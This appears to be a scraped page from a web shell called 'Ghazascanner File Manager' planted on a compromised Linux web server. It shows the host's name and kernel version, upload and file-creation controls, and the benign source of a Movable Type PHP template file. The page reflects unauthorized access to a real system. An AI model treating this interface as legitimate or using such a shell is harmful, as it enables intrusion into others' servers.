@Ghazascanner
_2019runbot
Ghazascanner File Manager
server :Linux hosjweb-prod1 6.12.0-107.59.3.2.el9uek.x86_64 #1 SMP PREEMPT_DYNAMIC Mon Dec 22 10:16:59 PST 2025 x86_64
Current Path :
/
homepage
/
v-mt
/
php
/
lib
/
Path :
Upload File :
New :
File
Dir
//homepage/v-mt/php/lib/block.mtincludeblock.php
<?php # Movable Type (r) (C) 2001-2008 Six Apart, Ltd. All Rights Reserved. # This code cannot be redistributed without permission from www.sixapart.com. # For more information, consult your Movable Type license. # # $Id$ function smarty_block_mtincludeblock($args, $content, &$ctx, &$repeat) { if (!isset($content)) { } else { require_once("function.mtinclude.php"); $vars =& $ctx->__stash['vars']; if (!$vars) { $vars = array(); $ctx->__stash['vars'] =& $vars; } $name = $args['var']; $name or $name = 'contents'; $oldval = $vars[$name]; $vars[$name] = $content; $content = smarty_function_mtinclude($args, $ctx); $vars[$name] = $oldval; } return $content; } ?>